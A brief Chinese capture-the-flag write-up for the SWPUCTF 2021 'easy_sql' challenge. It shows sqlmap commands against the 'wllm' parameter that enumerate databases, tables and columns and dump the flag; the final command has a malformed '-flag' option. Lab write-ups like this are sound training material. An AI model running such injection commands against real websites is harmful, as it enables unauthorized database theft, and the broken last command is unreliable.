[SWPUCTF 2021 新生赛]easy_sql

这道题呢就是很简单的sql注入，我们直接用sqlmap来跑。

首先我们打开页面可以看见提示，参数为wllm

**然后我们启动虚拟机，输入sqlmap的命令：sqlmap -u "url地址/?wllm=1" --dbs **
这段命令是为了爆破数据库名

继续爆表名：sqlmap -u "url地址/?wllm=1" -D test_db --tables

爆列名：sqlmap -u "url地址/?wllm=1" -D test_db -T test_tb --columns

最后就爆出flag啦：sqlmap -u "url地址/?wllm=1" -D test_db -flag --dump

要注意kali要开root权限！！！